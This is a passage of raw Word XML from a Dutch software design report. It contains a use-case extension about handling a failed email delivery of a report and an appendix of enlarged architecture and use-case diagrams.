                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2B63951B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00705E01" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r w:rsidRPr="00E673AC">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 3.10a: </w:t>
                            </w:r>
                            <w:r>
                              <w:t>gebruikt UC-3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="265BF950" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>10a – Het versturen van het rapport via email is mislukt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="317836FF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="33"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De beheerder van de rapporten, de administrator checkt welke rapporten niet zijn verzonden</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6BE2B2AB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="33"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De administrator verzend het rapport nogmaals</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72ED48BF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00192D9B" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="33"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Mocht het weer niet lukken dan neem de administrator contact op met de klant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46CF4" id="_x0000_s1127" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-7.85pt;margin-top:0;width:452.25pt;height:96pt;z-index:251873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R/3j8CAAByBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L46yeKlMeIUXbsOA7oL&#10;0O4DaFmOhUiiJymxs68fJSdZur0NexFEkT4kzyG9uhmMZnvpvEJb8unVhDNpBdbKbkr+/fnhzTVn&#10;PoCtQaOVJT9Iz2/Wr1+t+q6QM2xR19IxArG+6LuStyF0RZZ50UoD/go7acnZoDMQyHSbrHbQE7rR&#10;2WwyeZf16OrOoZDe0+v96OTrhN80UoSvTeNlYLrkVFtIp0tnFc9svYJi46BrlTiWAf9QhQFlKekZ&#10;6h4CsJ1Tf0EZJRx6bMKVQJNh0yghUw/UzXTyRzdPLXQy9ULk+O5Mk/9/sOLL/ptjqi75fElSWTAk&#10;0rPc+rCHLZtFfvrOFxT21FFgGN7jQDqnXn33iGLrmcW7FuxG3jqHfSuhpvqm8cvs4tMRx0eQqv+M&#10;NaWBXcAENDTORPKIDkbopNPhrI0cAhP0mC/mb/NFzpkg33Q2XZL6KQcUp88758NHiYbFS8kdiZ/g&#10;Yf/oQywHilNIzOZRq/pBaZ2MOHDyTju2BxqVajO2qHeGah3flvnknDLNZwxPqC+QtGV9yZf5LB9J&#10;epHFbapzDkK7ALwMMyrQUmhlSn59DoIiUvvB1mlkAyg93qkrbY9cR3pHosNQDUnW5fykYYX1gdh3&#10;OC4BLS1dWnQ/OetpAUruf+zASc70J0sKLqfzedyYZMzzxYwMd+mpLj1gBUGVPHA2Xu9C2rLIrcVb&#10;UrpRSYM4EmMlx5ppsBOJxyWMm3Npp6jfv4r1LwAAAP//AwBQSwMEFAAGAAgAAAAhALopr8bcAAAA&#10;CAEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwVu7acHaxkyKKF4KIrZ68LbJTpNg&#10;djbsbtr47x1Pdm6P9/HmvWI7uV6dKMTOM8JinoEirr3tuEH4OLzM1qBiMmxN75kQfijCtry+Kkxu&#10;/Znf6bRPjZIQjrlBaFMacq1j3ZIzce4HYvGOPjiTRIZG22DOEu56vcyylXamY/nQmoGeWqq/96ND&#10;cK8V7754560dD+E5rd4+aXNEvL2ZHh9AJZrSPwx/9aU6lNKp8iPbqHqE2eLuXlAEWST2Wg5UJdxm&#10;mYEuC305oPwFAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAOiR/3j8CAAByBAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAuimvxtwAAAAIAQAADwAA&#10;AAAAAAAAAAAAAACXBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" fillcolor="#f2f2f2 [3052]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2B63951B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00705E01" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r w:rsidRPr="00E673AC">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 3.10a: </w:t>
                      </w:r>
                      <w:r>
                        <w:t>gebruikt UC-3</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="265BF950" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>10a – Het versturen van het rapport via email is mislukt</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="317836FF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="33"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De beheerder van de rapporten, de administrator checkt welke rapporten niet zijn verzonden</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6BE2B2AB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="33"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De administrator verzend het rapport nogmaals</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72ED48BF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00192D9B" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="33"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Mocht het weer niet lukken dan neem de administrator contact op met de klant</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D52A7C" w14:textId="59B3ECA0" w:rsidR="00D4200A" w:rsidRPr="00D4200A" w:rsidRDefault="00D80333" w:rsidP="00D80333">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc491022105"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bijlage B</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="50C8B19F" w14:textId="64F562B2" w:rsidR="00377148" w:rsidRDefault="00493270" w:rsidP="00C10222">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc491022106"/>
      <w:r w:rsidRPr="001E1D12">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251900928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C9C931B" wp14:editId="51F35566">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-708660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1045845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10097135" cy="2995295"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1905"/>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ysteem lagen.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10097135" cy="2995295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00545101">
        <w:t>Vergrote Diagrammen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="69B48EEA" w14:textId="28713AFC" w:rsidR="00377148" w:rsidRDefault="00377148" w:rsidP="00377148"/>
    <w:p w14:paraId="748BF3DD" w14:textId="07EE44F5" w:rsidR="00AF06C4" w:rsidRDefault="00AF06C4" w:rsidP="00377148"/>
    <w:p w14:paraId="3CC78F09" w14:textId="77777777" w:rsidR="00AF06C4" w:rsidRPr="00AF06C4" w:rsidRDefault="00AF06C4" w:rsidP="00AF06C4"/>
    <w:p w14:paraId="4AEAFC60" w14:textId="77777777" w:rsidR="00AF06C4" w:rsidRPr="00AF06C4" w:rsidRDefault="00AF06C4" w:rsidP="00AF06C4"/>
    <w:p w14:paraId="5266DBCE" w14:textId="77777777" w:rsidR="00AF06C4" w:rsidRPr="00AF06C4" w:rsidRDefault="00AF06C4" w:rsidP="00AF06C4"/>
    <w:p w14:paraId="010E2F66" w14:textId="5FE91FCE" w:rsidR="00AF06C4" w:rsidRDefault="00AF06C4" w:rsidP="00AF06C4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1926"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7601F9" w14:textId="77777777" w:rsidR="00AF06C4" w:rsidRDefault="00AF06C4" w:rsidP="00AF06C4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1926"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACC4A7C" w14:textId="68A4D057" w:rsidR="007224E3" w:rsidRDefault="00AF06C4" w:rsidP="007224E3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1926"/>
        </w:tabs>
        <w:sectPr w:rsidR="007224E3" w:rsidSect="00493270">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251961344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21DAA324" wp14:editId="54BBA887">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-517525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>14605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10069195" cy="5260340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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datamodel architecture 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10069195" cy="5260340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F01FE0" w14:textId="77777777" w:rsidR="00836A3B" w:rsidRDefault="007224E3">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251999232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15D98116" wp14:editId="31B53E55">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>301625</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5213162" cy="9334500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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roces combining links and parameters.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5213162" cy="9334500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D9764" w14:textId="35E96279" w:rsidR="009B433D" w:rsidRDefault="004837D4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55737ABF" wp14:editId="4244AD98">
            <wp:extent cx="5095240" cy="889254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analyseproces.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5095240" cy="8892540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009B433D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FDBC80" w14:textId="77777777" w:rsidR="00377148" w:rsidRPr="007224E3" w:rsidRDefault="00377148" w:rsidP="007224E3">
      <w:pPr>
        <w:sectPr w:rsidR="00377148" w:rsidRPr="007224E3" w:rsidSect="007224E3">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1E3E3C" w14:textId="6E0AF5F5" w:rsidR="00A024DA" w:rsidRDefault="00A024DA" w:rsidP="00D81245"/>
    <w:p w14:paraId="5840CE5C" w14:textId="3DFA7273" w:rsidR="00A8798E" w:rsidRDefault="002658A8" w:rsidP="00D81245">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251902976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C057D5E" wp14:editId="0A39D7D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-836930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="10541000" cy="4648200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="493" name="Afbeelding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Domein Diagram.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10541000" cy="4648200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="188ED787" w14:textId="77777777" w:rsidR="00483F71" w:rsidRDefault="00483F71" w:rsidP="00D81245">
      <w:pPr>
        <w:sectPr w:rsidR="00483F71" w:rsidSect="001A1A4B">
          <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
          <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7349475C" w14:textId="187D55C0" w:rsidR="00B95B79" w:rsidRPr="00D81245" w:rsidRDefault="00483F71" w:rsidP="00D81245">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00F391FB" wp14:editId="5F216B38">
            <wp:extent cx="5760720" cy="8617585"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="495" name="Afbeelding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Systeem Use Case.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="8617585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B95B79" w:rsidRPr="00D81245" w:rsidSect="00483F7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D5E156" w14:textId="77777777" w:rsidR="009E74A5" w:rsidRDefault="009E74A5" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5315653C" w14:textId="77777777" w:rsidR="009E74A5" w:rsidRDefault="009E74A5" w:rsidP="004B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Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E10002FF" w:usb1="4000FCFF" w:usb2="00000009" w:usb3="00000000" w:csb0="000001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0A93F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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D07CCE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="004B0A6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E490C4" w14:textId="58503B63" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"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46F0C">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>106</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7DEC3F19" w14:textId="3BF00F40" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00E1319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8BF0C9" w14:textId="77777777" w:rsidR="009E74A5" w:rsidRDefault="009E74A5" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0DC0FE9A" w14:textId="77777777" w:rsidR="009E74A5" w:rsidRDefault="009E74A5" w:rsidP="004B0A6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53D59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D4A0E0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36F77A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B998A7A4"/>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3321F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6749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8EE4D66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AB24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C6537D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12D850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0E1A3AA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64462C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F403AA1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF88F72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0FD47083"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57DE72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114B119B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="462C8B0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46C26DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D0EF6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17670C82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="919A54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79857AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2BA56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1A6261E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B826B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1AC363EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAB02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1B9E404D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DA2B8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1D477396"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="246CC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1D8069A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="541AEB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1D836B6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32A4323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211E3A75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3B227B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17951FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A75CFD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23E719C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1BDC413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25D400B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE6097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2D427667"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB28FDD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nsid w:val="2E971880"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33688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332D04F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nsid w:val="347100C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC08248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nsid w:val="34E56A0F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5182B8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36E34E91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B44EC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380B3A34"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62C205E0"/>
    <w:lvl w:ilvl="0" w:tplc="F0129E96">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1068" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:r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29">
    <w:nsid w:val="3B55634C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="32E27D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nsid w:val="3C06748A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41444F2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3C5F52DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB52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3C9B3DDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0C4ADCA"/>
    <w:lvl w:ilvl="0" w:tplc="903CEEF8">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3F6848B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4">
    <w:nsid w:val="44623630"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D300A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nsid w:val="455D4CCF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1F0D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46254D52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D004C79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7">
    <w:nsid w:val="4CC13AAB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F168C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4EB8347C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="585EA9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514F15E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0D81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54963EE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="524A38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nsid w:val="584F0C56"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F2A18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nsid w:val="59CC25B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1B8E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5E5B1C11"/>
